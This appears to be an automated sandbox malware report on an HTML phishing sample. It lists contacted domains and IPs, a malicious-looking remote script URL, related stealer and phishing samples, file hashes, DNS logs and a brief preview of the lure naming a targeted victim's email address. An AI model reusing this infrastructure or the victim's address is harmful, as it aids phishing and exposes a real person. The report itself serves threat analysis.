Source	Detection	Scanner	Label
https://privacy-sandbox-demos-dsp-a.dev	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/.html#pshannon.moore@mymanatee.org	0%	Avira URL Cloud	safe
https://privacy-sandcastle-dev-dsp.web.app	0%	Avira URL Cloud	safe
https://privacy-sandbox-demos-ssp-y.dev	0%	Avira URL Cloud	safe
https://eloan.co.jp	0%	Avira URL Cloud	safe
https://privacy-sandcastle-dev-ssp.web.app	0%	Avira URL Cloud	safe
https://privacy-sandbox-demos-dsp.dev	0%	Avira URL Cloud	safe
https://dreammail.jp	0%	Avira URL Cloud	safe
https://superfine.org	0%	Avira URL Cloud	safe
https://gama.globo	0%	Avira URL Cloud	safe
https://nexxen.tech	0%	Avira URL Cloud	safe
https://marutishanbhag.com	0%	Avira URL Cloud	safe
https://aqfer.com	0%	Avira URL Cloud	safe
https://atirun.com	0%	Avira URL Cloud	safe
https://shared-storage-demo-publisher-a.web.app	0%	Avira URL Cloud	safe
https://roytsonlaw.com//attach/js/DN9YxDgT2IfcbDTLzkzzxg7rLKec65cARK2vYL6IZ5kCVB9G3P.js	0%	Avira URL Cloud	safe
https://privacy-sandbox-demos-ssp-b.dev	0%	Avira URL Cloud	safe
https://privacy-sandcastle-dev-ssp-a.web.app	0%	Avira URL Cloud	safe
https://bypass.jp	0%	Avira URL Cloud	safe
https://ayads.io	0%	Avira URL Cloud	safe
https://dabbs.net	0%	Avira URL Cloud	safe
https://privacy-sandcastle-dev-dsp-x.web.app	0%	Avira URL Cloud	safe
https://privacy-sandcastle-dev-ssp-y.web.app	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false	high
code.jquery.com	151.101.194.137	true	false	high
cdnjs.cloudflare.com	104.17.25.14	true	false	high
wicked.bigpoliceman.com	172.67.143.150	true	false	high
www.google.com	142.250.186.100	true	false	high
api.ipify.org	172.67.74.152	true	false	high
roytsonlaw.com	68.183.63.244	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Desktop/.html#pshannon.moore@mymanatee.org	true	Avira URL Cloud: safe	unknown
https://roytsonlaw.com//attach/js/DN9YxDgT2IfcbDTLzkzzxg7rLKec65cARK2vYL6IZ5kCVB9G3P.js	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://mediavine.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://connatix.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://yelp.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://nodals.io	privacy-sandbox-attestations.dat.2.dr	false		high
https://getyourguide.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://mediaintelligence.de	privacy-sandbox-attestations.dat.2.dr	false		high
https://privacy-sandcastle-dev-dsp.web.app	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://privacy-sandbox-demos-dsp-a.dev	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://permutive.app	privacy-sandbox-attestations.dat.2.dr	false		high
https://privacy-sandbox-demos-dsp.dev	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://adthrive.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://ad.gt	privacy-sandbox-attestations.dat.2.dr	false		high
https://easylist.to/)	LICENSE.txt.2.dr	false		high
https://gumgum.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://trkkn.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://logly.co.jp	privacy-sandbox-attestations.dat.2.dr	false		high
https://media6degrees.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://funplus.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://privacy-sandcastle-dev-ssp.web.app	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://inmobi.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://33across.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://dreammail.jp	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://jkforum.net	privacy-sandbox-attestations.dat.2.dr	false		high
https://iobeya.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://a-mo.net	privacy-sandbox-attestations.dat.2.dr	false		high
https://ebis.ne.jp	privacy-sandbox-attestations.dat.2.dr	false		high
https://privacy-sandbox-demos-ssp-y.dev	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://aphub.ai	privacy-sandbox-attestations.dat.2.dr	false		high
https://gama.globo	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://audienceproject.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://adsrvr.org	privacy-sandbox-attestations.dat.2.dr	false		high
https://finn.no	privacy-sandbox-attestations.dat.2.dr	false		high
https://lucead.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://verve.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://r2b2.io	privacy-sandbox-attestations.dat.2.dr	false		high
https://bluems.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://edkt.io	privacy-sandbox-attestations.dat.2.dr	false		high
https://atomex.net	privacy-sandbox-attestations.dat.2.dr	false		high
https://crcldu.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://rubiconproject.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://sitescout.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://apex-football.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://dotomi.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://ctnsnet.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://toponad.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://shinobi.jp	privacy-sandbox-attestations.dat.2.dr	false		high
https://superfine.org	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://360yield.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://usemax.de	privacy-sandbox-attestations.dat.2.dr	false		high
https://display.io	privacy-sandbox-attestations.dat.2.dr	false		high
https://adform.net	privacy-sandbox-attestations.dat.2.dr	false		high
https://eloan.co.jp	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://postrelease.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://aqfer.com	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://docomo.ne.jp	privacy-sandbox-attestations.dat.2.dr	false		high
https://shared-storage-demo-publisher-a.web.app	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://marutishanbhag.com	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://weborama-tech.ru	privacy-sandbox-attestations.dat.2.dr	false		high
https://innovid.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://demand.supply	privacy-sandbox-attestations.dat.2.dr	false		high
https://nexxen.tech	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://2k.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://advividnetwork.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://undertone.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://creative-serving.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://unrulymedia.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://tailtarget.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://paa-reporting-advertising.amazon	privacy-sandbox-attestations.dat.2.dr	false		high
https://privacy-sandbox-demos-ssp-b.dev	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://bypass.jp	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://dotdashmeredith.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://atirun.com	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://adingo.jp	privacy-sandbox-attestations.dat.2.dr	false		high
https://impact-ad.jp	privacy-sandbox-attestations.dat.2.dr	false		high
https://admatrix.jp	privacy-sandbox-attestations.dat.2.dr	false		high
https://openx.net	privacy-sandbox-attestations.dat.2.dr	false		high
https://taboola.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://ayads.io	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://i-mobile.co.jp	privacy-sandbox-attestations.dat.2.dr	false		high
https://uinterbox.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://mail.ru	privacy-sandbox-attestations.dat.2.dr	false		high
https://simeola.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://gmossp-sp.jp	privacy-sandbox-attestations.dat.2.dr	false		high
https://primecaster.net	privacy-sandbox-attestations.dat.2.dr	false		high
https://privacy-sandcastle-dev-ssp-a.web.app	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://worldhistory.org	privacy-sandbox-attestations.dat.2.dr	false		high
https://adnxs.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://dabbs.net	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://seedtag.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://casalemedia.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://privacy-sandcastle-dev-dsp-x.web.app	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://authorizedvault.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://privacy-sandcastle-dev-ssp-y.web.app	privacy-sandbox-attestations.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://sportradarserving.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://semafor.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://lwadm.com	privacy-sandbox-attestations.dat.2.dr	false		high
https://appconsent.io	privacy-sandbox-attestations.dat.2.dr	false		high
https://vg.no	privacy-sandbox-attestations.dat.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
68.183.63.244	roytsonlaw.com	United States	14061	DIGITALOCEAN-ASNUS	false
142.250.186.100	www.google.com	United States	15169	GOOGLEUS	false
151.101.194.137	code.jquery.com	United States	54113	FASTLYUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
104.26.13.205	unknown	United States	13335	CLOUDFLARENETUS	false
104.17.25.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
172.67.143.150	wicked.bigpoliceman.com	United States	13335	CLOUDFLARENETUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4
192.168.2.6

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1636192
Start date and time:	2025-03-12 14:06:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	.html
Detection:	MAL
Classification:	mal84.phis.winHTML@30/38@18/10
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
Excluded IPs from analysis (whitelisted): 216.58.206.46, 142.250.184.227, 142.250.185.110, 142.250.110.84, 142.250.186.142, 84.201.210.23, 142.250.184.206, 142.250.185.78, 142.250.184.238, 142.250.185.206, 199.232.210.172, 216.58.212.131, 216.58.206.35, 34.104.35.123, 74.125.71.84, 142.250.186.174, 142.250.186.78, 142.250.186.46, 142.250.185.142, 216.58.206.78, 142.250.186.67, 66.102.1.84, 216.58.206.67, 52.149.20.212
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:07:00	Task Scheduler	Run new task: {631511D1-8CCB-4D2B-A98B-007E84B8A82F} path: .

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
151.101.194.137	http://facebooksecurity.blogspot.ro/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://facebooksecurity.blogspot.dk/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://soporte-store.info/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://mi-outlook-loggin.click/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.9.1.js
	http://facebooksecurity.blogspot.pe/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	https://tracker.club-os.com/campaign/click?qDomYmsgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=demsaenlinea.mx/jahn/00987667839933/utilities@affordablecare.com	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
104.26.13.205	get_txt.ps1	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	XkgoE6Yb52.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	R1TftmQpuQ.bat	Get hash	malicious	Targeted Ransomware	Browse	api.ipify.org/
	SpacesVoid Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	BiXS3FRoLe.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	lEUy79aLAW.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	Simple1.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
code.jquery.com	Message.eml	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://app.storylane.io/share/ttfgdirdpl74	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.130.137
	Inv#8653763981_2sfgPaymentAdvice.svg	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://marktmagie.com/auth8523796254hfdhsf734/ogo00dex.html#uiptcgcu@uiprail.org	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	.svg	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://mailtrack.io/l/602b7f5905dfb2b7053f69bb1ad3f5e5fe2093ad?url=https%3A%2F%2Fbusinessaccounts-suite.com&u=12237839&signature=92845e946510e802#user_email=m.alarcon@servihabitat.com&fname=Mireia&lname=Alarcon	Get hash	malicious	Unknown	Browse	151.101.130.137
	20250031011(12 Mar 2025).pdf.html	Get hash	malicious	Unknown	Browse	151.101.130.137
	20250031011(12 Mar 2025).pdf.html	Get hash	malicious	Unknown	Browse	151.101.66.137
	20250031011(12 Mar 2025).pdf.html	Get hash	malicious	Unknown	Browse	151.101.2.137
	ATT48234.svg	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
cdnjs.cloudflare.com	http://www.tfeweb.co.uk	Get hash	malicious	Unknown	Browse	104.17.24.14
	Message.eml	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://www.dkgroup.fr	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://app.storylane.io/share/ttfgdirdpl74	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	104.17.24.14
	Inv#8653763981_2sfgPaymentAdvice.svg	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	Shinhan_DocuSign_312047735687684052652423710713974466111628395562753690xqIDWOeXtHYBeNKrTAww.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.directhealthcaregroup.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	.svg	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://links.truthsocial.com/link/114146761665966840	Get hash	malicious	Unknown	Browse	104.17.25.14
	ATT48234.svg	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
wicked.bigpoliceman.com	https://publizr.com/alliedcon/allied-construction	Get hash	malicious	Gabagool	Browse	172.67.143.150
	https://publizr.com/alliedcon/allied-construction	Get hash	malicious	Gabagool	Browse	104.21.27.207
	https://www.gruzoved.com/blog/post/eshe-dve-dorogi-zakryli-na-sahaline-iz-za-nepogody/?next=https%3A%2F%2Fgamma.app%2Fdocs%2Fmeyertrucks-Trust-Meyer-Trucks-diesel-truck-bus-parts-q218q3p16jcbi7h%3Fmode%3Dpresent%23card-5kvf1fu5246tolr	Get hash	malicious	Gabagool	Browse	104.21.27.207
	https://wicked.bigpoliceman.com	Get hash	malicious	Unknown	Browse	172.67.143.150
	https://e888svhbb.cc.rs6.net/tn.jsp?f=001kuAvp5TZb__Hkifiw1Dunrq7wGEuQ1ioGKofiYBXVujoaWV9xYRWR1NK5wV0yrjXHozkOiJoFy-_-xeRfbezti7UsyxwA2dObzWg4IuOexzrl4iTD1i4Fe_lvIih5NV4OF4opUEjifUAoUGrwVf0CNMgWAbr-5BdIzJNJgud80U=&c=T1nFM6kA2ta7fejIlZLSkDMPoVolrtIWpCZM5m5CVpkkIsemh9-qEQ==	Get hash	malicious	Unknown	Browse	172.67.143.150

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Play Voicemail Transcription. (387.KB).svg	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	REFUND STATUS.docx	Get hash	malicious	Unknown	Browse	172.64.146.215
	.svg	Get hash	malicious	HTMLPhisher	Browse	172.67.158.181
	https://go.51.ca	Get hash	malicious	Unknown	Browse	188.114.96.3
	ca703fd579bbcee73544b9b37f8a6469.bin.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.61.68
	https://we.tl/t-BnGuynUcjL	Get hash	malicious	Unknown	Browse	104.18.27.193
	PENDING PAYMENT FOR March SOA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	DEVM24-clean.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	https://jkhmonteithfgintcoukjg.taplink.ws	Get hash	malicious	Unknown	Browse	104.19.147.54
CLOUDFLARENETUS	Play Voicemail Transcription. (387.KB).svg	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	REFUND STATUS.docx	Get hash	malicious	Unknown	Browse	172.64.146.215
	.svg	Get hash	malicious	HTMLPhisher	Browse	172.67.158.181
	https://go.51.ca	Get hash	malicious	Unknown	Browse	188.114.96.3
	ca703fd579bbcee73544b9b37f8a6469.bin.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.61.68
	https://we.tl/t-BnGuynUcjL	Get hash	malicious	Unknown	Browse	104.18.27.193
	PENDING PAYMENT FOR March SOA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	DEVM24-clean.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	https://jkhmonteithfgintcoukjg.taplink.ws	Get hash	malicious	Unknown	Browse	104.19.147.54
DIGITALOCEAN-ASNUS	sync.arm5.elf	Get hash	malicious	Unknown	Browse	138.197.122.150
	VirusSick.exe	Get hash	malicious	Unknown	Browse	162.243.121.232
	Setup.exe	Get hash	malicious	Unknown	Browse	104.248.126.225
	cbr.m68k.elf	Get hash	malicious	Mirai	Browse	46.101.242.248
	rbot.elf	Get hash	malicious	Unknown	Browse	188.166.241.150
	https://gamma.app/docs/Innovative-Industrial-Fabricators-LLC-l9jiky9l79t1mba?mode=present#card-04miadc3h3yvc0w	Get hash	malicious	HTMLPhisher	Browse	178.128.55.71
	https://gamma.app/docs/Innovative-Industrial-Fabricators-LLC-l9jiky9l79t1mba?mode=present#card-04miadc3h3yvc0w	Get hash	malicious	HTMLPhisher	Browse	178.128.55.71
	cbr.m68k.elf	Get hash	malicious	Mirai	Browse	45.55.195.230
	BJtPlI.dll	Get hash	malicious	Unknown	Browse	188.166.28.204
	https://ancollc.mrsnolas.com/	Get hash	malicious	Unknown	Browse	206.189.101.113
FASTLYUS	.svg	Get hash	malicious	HTMLPhisher	Browse	151.101.65.229
	https://go.51.ca	Get hash	malicious	Unknown	Browse	151.101.1.195
	https://we.tl/t-BnGuynUcjL	Get hash	malicious	Unknown	Browse	151.101.192.84
	Message.eml	Get hash	malicious	HTMLPhisher	Browse	151.101.65.229
	https://www.dkgroup.fr	Get hash	malicious	Unknown	Browse	151.101.1.229
	https://app.storylane.io/share/ttfgdirdpl74	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.1.229
	Inv#8653763981_2sfgPaymentAdvice.svg	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://marktmagie.com/auth8523796254hfdhsf734/ogo00dex.html#uiptcgcu@uiprail.org	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	.svg	Get hash	malicious	HTMLPhisher	Browse	151.101.65.229
	https://wrasse-horse-3nb9.squarespace.com/	Get hash	malicious	Unknown	Browse	151.101.128.237

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3636_1181785141\Google.Widevine.CDM.dll	https://centrepatronal.blob.core.windows.net/heberhard/centrepatronal.html	Get hash	malicious	HTMLPhisher	Browse
	cndx.com.eml	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse
	Fd-Employee-Handbook(1).pdf	Get hash	malicious	Unknown	Browse
	ATT001_2674865722.htm	Get hash	malicious	Unknown	Browse
	https://drive.usercontent.google.com/u/0/uc?id=1oVYWzJi9Tw6x0zGRa8di76JxbjhDHWgd&export=download	Get hash	malicious	Unknown	Browse
	call_playback_Senecacollege.html	Get hash	malicious	HTMLPhisher	Browse
	HwusQ091ed.html	Get hash	malicious	Unknown	Browse
	Listen Now!!.html	Get hash	malicious	HTMLPhisher, Invisible JS	Browse
	https://storage.googleapis.com/arctic-carving-450917-d9.appspot.com/Vac.html#xxxx@gmail.com	Get hash	malicious	HTMLPhisher	Browse
	YiCRY9tceW.exe	Get hash	malicious	Unknown	Browse

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1805
Entropy (8bit):	6.024883607738449
Encrypted:	false
SSDEEP:	48:p/h4uF8hr7akIQ2hWNW22oM3ItR0kpOg+G1F:ROuF8p7adWN12OtR0Lgnr
MD5:	576F86C13500904B2CFF79E7EE9813BF
SHA1:	A448BFCB7487342E71203F696C91364A881B1A07
SHA-256:	A6EDBEAD87C0D10CA54F31D719232D4766ECD85247C639097D68777812203BBB
SHA-512:	5AD87C8AF6C6A8DE90BB09E537EB04D343B7760E5692963C1CF8D6FFFDCD008165DAAECCA94510B591C2BB4C17BD64E48F93ED5277F38A87C53ADED0A7D46ED6
Malicious:	false
Reputation:	low
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJoaXN0b3J5X3NlYXJjaF9zdHJpbmdzX2Zhcm1oYXNoZWQuYmluYXJ5cGIiLCJyb290X2hhc2giOiJ1YTFtVjdKTl90enFQNm5uY3RTWUw5dDdLRTByc01MRExMSDZnR095NGM0In0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6InRoLVdQczdGUDNkdnZudGVUSXpKM1l4eU5iNGtTV19CaFhmVmcyMzh1VHMifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJwa29ta2RqcG1qZmJrZ2pqbW1haW9lZ2FvamdkYWhrbSIsIml0ZW1fdmVyc2lvbiI6IjYuNzQzMS45NjkyIiwicHJvdG9jb2xfdmVyc2lvbiI6MX0","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"MULn4zJoWgjGUovjaEHu5NdNW5uCggff98O6sYiY-a_-S7Ukq2rs9C8W20Ptv7UEhYotzE4oil8LYnY-UqU0ldSc1rW3zPuSq0noBsKqcWqb6LZPThWRJL7mu7NC6lU1LXtDjjA-v9Nckv93kI6GF4oXGWWD9TdTgM43sHL8NgyzSnplNmZFc5wPIRV0NETtKxxsH9xpq1koJOHX4QlDMHkBW1hgHTq3cxx4o_oUDOv2Z7tBDz0wrhoqfNNsB6S7XByGiqjggrMcVdKSNN-4M29i6MxtcUXiM4Ub6URQWqytMmMnvE

File type:	HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (393), with CRLF line terminators
Entropy (8bit):	5.705678081326079
TrID:	Text - UTF-8 encoded (3003/1) 100.00%
File name:	.html
File size:	808 bytes
MD5:	ec8775c26e1cab58ef799e1b2087290a
SHA1:	41003ca9cac239cdcbc68b49be0e0a9f74f7accd
SHA256:	15e4212ca6f76004f34c2ba6ffcf0e49dd8b8a2e8374f22beca352be67872b42
SHA512:	0facb236deff7a032c3362cb9eed8a978bca133222dcda6b81952ccaf9bf4e0780443958911715340f6255001c2d8e603e5119b236d83bf3c7200a3a8c657208
SSDEEP:	24:5gJMfzeNVMDyy/lMWf4zxFYsjgnjAQgwuXddAGhAntM/:UM7/DiUix+s+jvHuNdAqj/
TLSH:	A1018EAD5CACE6250031846BA5F07AEEDD25154B1B999159B2CC33372F153B84993DE0
File Content Preview:	...<div style="display:none;"> Smile, breathe and go slowly. </div>..<html>..<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script>.. RmyNMvULOx = `shannon.moore@mymanatee.org`;.. </script>.

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 12, 2025 14:07:15.821520090 CET	53	53927	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:15.990374088 CET	53	56737	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:20.381078959 CET	64483	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:20.381268978 CET	62843	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:20.387742043 CET	53	64483	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:20.388099909 CET	53	62843	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:21.661521912 CET	50848	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:21.661700964 CET	58473	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:21.668149948 CET	53	50848	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:21.668356895 CET	53	58473	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:39.426690102 CET	51451	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:39.426928043 CET	49782	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:39.443079948 CET	53	49782	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:39.479350090 CET	53	51451	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:39.494618893 CET	53	52236	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:42.335966110 CET	49788	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:42.336158037 CET	55450	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:42.350850105 CET	53	49788	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:42.352061033 CET	53	55450	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:48.028889894 CET	54568	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:48.029067993 CET	63386	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:48.032619953 CET	56129	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:48.032805920 CET	65283	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:48.035511971 CET	53	54568	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:48.036269903 CET	53	63386	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:48.057287931 CET	53	65283	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:48.062647104 CET	53	56129	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:50.860337973 CET	53865	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:50.860761881 CET	49777	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:50.866975069 CET	53	53865	1.1.1.1	192.168.2.6
